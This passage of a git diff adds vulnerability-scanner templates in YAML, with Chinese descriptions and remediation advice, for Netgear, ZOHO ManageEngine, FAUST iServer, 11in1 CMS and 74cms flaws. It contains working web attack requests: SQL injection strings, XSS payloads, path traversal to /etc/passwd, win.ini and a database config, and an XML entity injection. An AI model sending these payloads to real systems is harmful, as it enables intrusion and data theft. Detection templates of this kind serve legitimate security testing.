https://kb.netgear.com/000062646/security-advisory-for-multiple-httpd-authentication-vulnerabilities-on-dgn2200v1 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:https://kb.netgear.com +requests: +- matchers: + - type: status + status: + - 200 + - type: word + words: + - WAN Setup + matchers-condition: and + raw: + - | + GET /WAN_wan.htm?.gif HTTP/1.1 + Host: {{Hostname}} + Accept: */* + - | + GET /WAN_wan.htm?.gif HTTP/1.1 + Host: {{Hostname}} + Accept: */* diff --git a/config/51pwn/yaml/ ZOHO ManageEngine Netflow Analyzer/CVE-2018-12998.yaml b/config/51pwn/yaml/ ZOHO ManageEngine Netflow Analyzer/CVE-2018-12998.yaml new file mode 100755 index 000000000..b3e51a9d5 --- /dev/null +++ b/config/51pwn/yaml/ ZOHO ManageEngine Netflow Analyzer/CVE-2018-12998.yaml @@ -0,0 +1,35 @@ +id: CVE-2018-12998 +info: + name: Zoho manageengine Arbitrary Reflected XSS + author: + - l0ne1y + description: |- + 多款ZOHO产品跨站脚本漏洞 + ZOHO ManageEngine Netflow Analyzer等都是美国卓豪(ZOHO)公司的产品。ZOHO ManageEngine Netflow Analyzer是一套基于Web的带宽监控工具。Network Configuration Manager是一套用于配置交换机、路由器、防火墙和其他网络设备的网络配置管理、网络变更和配置管理(NCCM)软件。 + + 多款ZOHO产品中存在跨站脚本漏洞。远程攻击者可通过向/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet URL发送‘operation’参数利用该漏洞注入任意的Web脚本或HTML。以下产品和版本受到影响:ZOHO ManageEngine Netflow Analyzer build 123137之前版本;Network Configuration Manager build 123128之前版本;OpManager build 123148之前版本;OpUtils build 123161之前版本;Firewall Analyzer build 123147之前版本。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.manageengine.com/ + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + part: body + words: + - + - type: status + status: + - 200 + - type: word + part: header + words: + - text/html + matchers-condition: and + path: + - '{{BaseURL}}/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + method: GET diff --git a/config/51pwn/yaml/ faust_iserver/CVE-2021-34805.yaml b/config/51pwn/yaml/ faust_iserver/CVE-2021-34805.yaml new file mode 100755 index 000000000..d9b576850 --- /dev/null +++ b/config/51pwn/yaml/ faust_iserver/CVE-2021-34805.yaml @@ -0,0 +1,50 @@ +id: CVE-2021-34805 +info: + name: FAUST iServer 9.0.018.018.4 - Local File Inclusion + author: + - 0x_akoko + tags: + - cve + - cve2021 + - faust + - iserver + - lfi + description: |- + Land Software Faust Iserver 路径遍历漏洞 + Land Software Faust Iserver是德国Land Software公司的用于将 Faust、Faust Entry 和 Lidos 数据库带到内联网和互联网上。 + + Land Software FAUST iServer 9.0.017.017.1- 9.0.018.018.4版本存在路径遍历漏洞,该漏洞源于软件缺少对于本地包含的限制,导致本地文件包含漏洞。. + reference: + - https://cxsecurity.com/issue/wlb-2022010120 + - https://www.cvedetails.com/cve/cve-2021-34805 + - http://packetstormsecurity.com/files/165701/faust-iserver-9.0.018.018.4-local-file-inclusion.html + - http://www.land-software.de/lfs.fau?prj=iweb&dn=faust+iserver + severity: high + classification: + cve-id: + - cve-2021-34805 + cwe-id: + - cwe-22 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + remediation: "官方修复方案:\n1、建议用户到官方获取最新补丁或者最新版本程序:\nhttp://www.land-software.de/lfs.fau?prj=iweb&dn=faust+iserver\n临时修复方案:\n1、系统开发阶段的防御,在系统开发阶段应充分考虑系统的安全性,对目录遍历漏洞来说,需对用户提交的内容进行严格的过滤,这里主要指过滤目录跳转符,字符截断符,dir命令等。\n2、系统运行阶段的防御,系统运维人员需有强烈的安全意识,他们的一举一动都会影响用户的个人隐私信息安全。对系统运维人员来说,部署新的业务系统或者安装新的软件或应用后应通过web扫描工具积极查找系统是否存在目录遍历漏洞,尽可能不要在服务器上安装与业务不相关的第三方软件以避免引入目录遍历漏洞。除此之外,还应该合理配置web服务器(禁止目录浏览,分配好目录权限等)并积极关注所使用的各种软件和应用的版本发布情况,及时升级新的软件版本。'\n3、服务器配置,为更好的保护系统安全,实际生产环境和测试开发环境应该隔离。在生产环境中的任何改动,都需要严格遵循变更管理流程,做到执行人、执行时间、执行对象和具体改动均记录在案,并有企业信息安全部门进行事前审核和事后审计。技术人员一般不要直接调试生产系统,可以在测试环境中调试完成后再更新生产系统,以避免调试过程中开启某些接口、更改某些配置或者保存某些调试信息造成安全隐患。如果非要在线调试生产系统,而且需要保存调试信息时,应避免将调试信息直接保存到服务器本地,同时调试完成后应第一时间删除相关调试信息并恢复系统配置。\n + \ 1)IIS:打开 IIS 管理器,然后导航至您要管理的级别;在“功能视图”中,双击“目录浏览”;在“操作”窗格中,选择“目录浏览”功能,单击“禁用”。\n + \ 2)Nginx:找到Nginx配置文件中的“autoindex”,设置为“off”,然后重启Nginx。\n 3)Apache:修配置文件httpd.conf,把:Options + Indexes FollowSymLinks 改为:Options -Indexes FollowSymLinks ,然后重启Apache。\n 4)Tomcat:在应用的WEB-INF目录找到web.xml配置文件,将“listings”参数的初始化值设置为“false”,然后重启Tomcat。 + \ \n4、安全设备的防御,进行目录遍历攻击时,攻击者基本都会使用目录跳转符,同时可能配合使用字符截断符,dir命令等。对专业的安全设备来说通过检测特定语法下的目录跳转符,字符截断符,以及与查看目录相关的命令即可识别各种目录遍历攻击。部署专业的安全设备不仅可以很好的保护业务系统自身的目录遍历漏洞,同时还能防御web服务器和服务器上其他非业务相关的第三方应用漏洞引发的目录遍历攻击。\n" +requests: +- matchers: + - type: word + condition: and + part: body + words: + - bit app support + - fonts + - extensions + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini' + method: GET diff --git a/config/51pwn/yaml/11in1 CMS/CVE-2012-0996.yaml b/config/51pwn/yaml/11in1 CMS/CVE-2012-0996.yaml new file mode 100755 index 000000000..0c8fab5f2 --- /dev/null +++ b/config/51pwn/yaml/11in1 CMS/CVE-2012-0996.yaml @@ -0,0 +1,32 @@ +id: CVE-2012-0996 +info: + name: 11in1 CMS 1.2.1 - Local File Inclusion (LFI) + author: + - l0ne1y + description: |- + 11in1 CMS本地文件包含漏洞 + 11in1中存在跨站请求伪造漏洞和本地文件包含漏洞。攻击者可利用这些漏洞在受影响站点上下文的不知情用户浏览器上执行任意脚本代码,盗取基于cookie的认证证书,在受影响应用程序上下文中打开或运行任意文件。11in1 1.2.1版本中存在这些漏洞,其它版本也可能受到影响。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.11in1.org/ + + 临时修复方案: + 1、PHP 中使用 open_basedir 配置限制访问在指定的区域,路径长短截断 + 2、过滤.(点)/(反斜杠)\\(反斜杠),编码绕过 + 3、禁止服务器远程文件包含 + 4、对于限制了包含文件后缀的情况,PHP版本小于5.3,php.ini magic_quotes_gpc = off,对可控参数未使用addslashes函数,满足这三个条件就可以使用%00截断。 + 5、问号、井号、空格绕过(远程) +requests: +- matchers: + - type: regex + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00' + method: GET diff --git a/config/51pwn/yaml/74cms/74cms-Getshell.yaml b/config/51pwn/yaml/74cms/74cms-Getshell.yaml new file mode 100755 index 000000000..ea1eb1223 --- /dev/null +++ b/config/51pwn/yaml/74cms/74cms-Getshell.yaml @@ -0,0 +1,40 @@ +id: 74cms-Getshell +info: + name: 74cms前台某处Getshell漏洞 + author: + - jim2g + description: |+ + 74cms前台存在文件上传漏洞 + 在Web程序中,通常会涉及到一些文件上传的功能,如头像上传、图片上传、附件上传等,由于Web中间件会根据用户的请求去执行特定后缀的文件(asp、php、cgi、aspx、jsp等),如果在上传文件的功能中未限制上传文件的后缀,导致可以上传“asp、php、cgi、aspx、jsp、html”等后缀的执行文件时,那么攻击者可以利用此漏洞上传恶意的可执行文件来执行恶意的代码,比如文件读写、命令执行,这样即可直接控制服务器。 + + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.74cms.com/download/index.html + 临时修复方案: + 文件上传: + 1、服务器端将文件上传目录直接设置为不可执行。 + 2、文件类型检查:建议使用白名单方式(比黑名单更可靠),并结合MIME Type、后缀检查等方式(文件类型做白名单限制)。此外对于图片的处理可以使用压缩函数或resize函数,处理图片的同时破坏其包含的HTML代码。 + 3、使用随机数改写文件名和文件路径,使得用户不能轻易访问自己上传的文件。 + 4、单独设置文件服务器的域名。 + 5、验证文件内容,使用正则匹配恶意代码(过滤恶意代码各种绕过方式,如大小写、BASE64编码)限制上传。 + 6、修复服务器可能存在的解析漏洞。 + 7、严格限制可以修改服务器配置的文件上传如:.htaccess。 + 8、隐藏上传文件路径。 + 9、升级Web Server。 + 10、及时修复Web上传代码。 + 11、不能有本地文件包含漏洞。 + 12、注意0x00截断攻击(PHP更新到最新版本)。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'c22a46bb7b016f8a8c3357e2f22ff21d') + raw: + - | + GET /index.php?m=&c=M&a=index&type=../favicon.ico HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/74cms/74cms-show-sqli.yaml b/config/51pwn/yaml/74cms/74cms-show-sqli.yaml new file mode 100755 index 000000000..b9a761152 --- /dev/null +++ b/config/51pwn/yaml/74cms/74cms-show-sqli.yaml @@ -0,0 +1,40 @@ +id: 74cms-show-sqli +info: + name: 74cms wap-company-show.php SQL注入漏洞检测 + author: + - jim2g + description: |+ + 74cms wap-company-show.php存在SQL注入漏洞 + 结构化查询语言(Structured Query Language)简称SQL,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统,同时也是数据库脚本文件的扩展名。 + 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。 + + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200&&status_code_1==200 + - contains(raw_1,"wap-jobs-show.php?id=1") + - contains(raw_2,"wap-jobs-show.php?id=1") + raw: + - | + GET /wap/wap-company-show.php?id=1%20and%20ascii(substring((md5(0x11)),1,1))=52 HTTP/1.1 + Host: {{Hostname}} + - | + GET /wap/wap-company-show.php?id=1%20and%20ascii(substring((md5(0x11)),1,1))=53 HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/74cms/74cms-v3-Boolean-injection.yaml b/config/51pwn/yaml/74cms/74cms-v3-Boolean-injection.yaml new file mode 100755 index 000000000..17c5731db --- /dev/null +++ b/config/51pwn/yaml/74cms/74cms-v3-Boolean-injection.yaml @@ -0,0 +1,41 @@ +id: 74cms-v3-Boolean-injection +info: + name: 74cms v3.x plus_ajax_common.php_ &query 布尔注入 + author: + - jim2g + description: |+ + 74cms v3.x plus_ajax_common.php_ &query存在SQL注入漏洞 + 结构化查询语言(Structured Query Language)简称SQL,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统,同时也是数据库脚本文件的扩展名。 + 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。 + + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.74cms.com/download/index.html + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200&&status_code_2==200 + - contains(body_1,"suggestions") + - contains(body_2,"suggestions") + - body_1!=body_2 + raw: + - | + GET /plus/ajax_common.php?act=hotword&query=%88%ec%27%20||%20443=443--%20a HTTP/1.1 + Host: {{Hostname}} + - | + GET /plus/ajax_common.php?act=hotword&query=%88%ec%27%20||%20443=444--%20a HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/74cms/74cms-xss.yaml b/config/51pwn/yaml/74cms/74cms-xss.yaml new file mode 100755 index 000000000..e797bfb85 --- /dev/null +++ b/config/51pwn/yaml/74cms/74cms-xss.yaml @@ -0,0 +1,26 @@ +id: 74cms-xss +info: + name: 74cms反射xss + author: + - jim2g + description: "74cms存在跨站脚本漏洞 \nXSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 + VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。\\n反射型XSS,是最普遍的类型。用户访问服务器-跨站链接-返回跨站代码,它的特点是非持久化,必须用户点击带有特定参数的链接才能引起。\n\n" + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.74cms.com/download/index.html + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。' +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'autofocus onfocus=alert(1) style=') + raw: + - | + GET /jobs/jobs-list.php?key=%22%20autofocus%20onfocus=alert%281%29%20style=%22%22 HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/74cms/74cms_V3-plusa-sqli.yaml b/config/51pwn/yaml/74cms/74cms_V3-plusa-sqli.yaml new file mode 100755 index 000000000..4b8e202d9 --- /dev/null +++ b/config/51pwn/yaml/74cms/74cms_V3-plusa-sqli.yaml @@ -0,0 +1,36 @@ +id: 74cms_V3-plusa-sqli +info: + name: 74cms_V3.4_plusajax_officebuilding.php_SQL注入漏洞 + author: + - jim2g + description: |+ + 74cms_V3.4_plusajax_officebuilding.php_存在SQL注入漏洞 + 结构化查询语言(Structured Query Language)简称SQL,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统,同时也是数据库脚本文件的扩展名。 + 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。 + + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.74cms.com/download/index.html + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"3438d5e3ead84b2effc5ec33ed1239f5") + raw: + - | + GET /plus/ajax_officebuilding.php?act=key&key=asd%E9%94%A6%27%20uniounionn%20selselectect%201,2,3,md5(7836457),5,6,7,8,9%23 HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/74cms/74cms_file_read.yaml b/config/51pwn/yaml/74cms/74cms_file_read.yaml new file mode 100755 index 000000000..41e8a8714 --- /dev/null +++ b/config/51pwn/yaml/74cms/74cms_file_read.yaml @@ -0,0 +1,39 @@ +id: 74cms_file_read +info: + name: 74cms index.php a=register 任意文件读取 + author: + - jim2g + description: |+ + 74cms存在任意文件读取漏洞 + 任意文件读取漏洞不同于网站目录浏览,此漏洞不仅仅可遍历系统下web中的文件,而且可以浏览或者下载到系统中的文件,攻击人员通过目录遍历攻击可以获取系统文件及服务器的配置文件等等。一般来说,攻击者利用服务器API、文件标准权限进行攻击。任意文件读取/下载漏洞可能存在于Web服务器软件本身,也可能存在于Web应用程序之中。 + + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.74cms.com/download/index.html + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"3a1c6cc728dddc258091a601f28a9c12") + - contains(body,"53fef78841c3fae1ee992ae324a51620") + - contains(body,"4c2fc69dc91c885837ce55d03493a5f5") + raw: + - | + POST /index.php?m=Home&c=Members&a=register HTTP/1.1 + Host: {{Hostname}} + X-Requested-With: XMLHttpRequest + Cookie: members_bind_info[temp_avatar]=../../../../Application/Common/Conf/db.php;members_bind_info[type]=qq;members_uc_info[password]=123456;members_uc_info[uid]=1;members_uc_info[username]=tttttt + Upgrade-Insecure-Requests: 1 + + reg_type=2&utype=2&org=bind&ucenter=bind""" + req-condition: true diff --git a/config/51pwn/yaml/74cms/74cms_v4-register-sqli.yaml b/config/51pwn/yaml/74cms/74cms_v4-register-sqli.yaml new file mode 100755 index 000000000..c4ffe247a --- /dev/null +++ b/config/51pwn/yaml/74cms/74cms_v4-register-sqli.yaml @@ -0,0 +1,39 @@ +id: 74cms_v4-register-sqli +info: + name: 74cms v4.2.126 HomeMembers register注入 + author: + - jim2g + description: |+ + 74cms v4.2.126 前台SQL注入漏洞 + 结构化查询语言(Structured Query Language)简称SQL,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统,同时也是数据库脚本文件的扩展名。 + 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。 + + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.74cms.com/download/index.html + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"e165421110ba03099a1c0393373c5b4") + raw: + - | + POST /index.php?m=&c=Members&a=register HTTP/1.1 + Host: {{Hostname}} + Cookie:members_uc_info[reg_type]=1;members_uc_info[utype]=2;members_uc_info[mobile][0]=match;members_uc_info[mobile][1][0]=aaaaaaa%22) and updatexml(1,concat(0x7e,(select md5(233))),0) -- a + + reg_type=2&utype=2&ucenter=bind&unbind_mobile=1 + req-condition: true diff --git a/config/51pwn/yaml/74cms/wooyun-2010-075009.yaml b/config/51pwn/yaml/74cms/wooyun-2010-075009.yaml new file mode 100755 index 000000000..601d1e161 --- /dev/null +++ b/config/51pwn/yaml/74cms/wooyun-2010-075009.yaml @@ -0,0 +1,47 @@ +id: wooyun-2010-075009 +info: + name: 74cms_SQL注入 + author: + - jim2g + description: | + 74cms存在SQL注入漏洞 + 结构化查询语言(Structured Query Language)简称SQL,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统,同时也是数据库脚本文件的扩展名。 + 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。 + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"c4ca4238a0b923820dcc509a6f75849b") + raw: + - | + POST /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709×tamp=&nonce= HTTP/1.1 + Host: {{Hostname}} + + + + ]> + + &test; + 1111 + 123 + 3 + 1%' union select md5(1)# + + req-condition: true diff --git a/config/51pwn/yaml/74cms/wooyun-2014-063225.yaml b/config/51pwn/yaml/74cms/wooyun-2014-063225.yaml new file mode 100755 index 000000000..96632e419 --- /dev/null +++ b/config/51pwn/yaml/74cms/wooyun-2014-063225.yaml @@ -0,0 +1,39 @@ +id: wooyun-2014-063225 +info: + name: 74cms_sql_injection + author: + - jim2g + description: | + 74cms_injection 存在SQL注入漏洞 + 结构化查询语言(Structured Query Language)简称SQL,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统,同时也是数据库脚本文件的扩展名。 + 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。 + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code1==200&&status_code1==200 + - contains(body_1,"c4ca4238a0b923820dcc509a6f75849b") + - contains(body_2,"c4ca4238a0b923820dcc509a6f75849b") + raw: + - | + GET /plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27union+/*!50000SeLect*/+1,md5%281%29,3%23 HTTP/1.1 + Host: {{Hostname}} + - | + GET /plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,md5(1),3%23 HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/74cms/wooyun-2014-069833.yaml b/config/51pwn/yaml/74cms/wooyun-2014-069833.yaml new file mode 100755 index 000000000..49c2405a5 --- /dev/null +++ b/config/51pwn/yaml/74cms/wooyun-2014-069833.yaml @@ -0,0 +1,28 @@ +id: wooyun-2014-069833 +info: + name: 74CMS Flash XSS漏洞 + author: + - jim2g + description: "74CMS存在跨站脚本漏洞 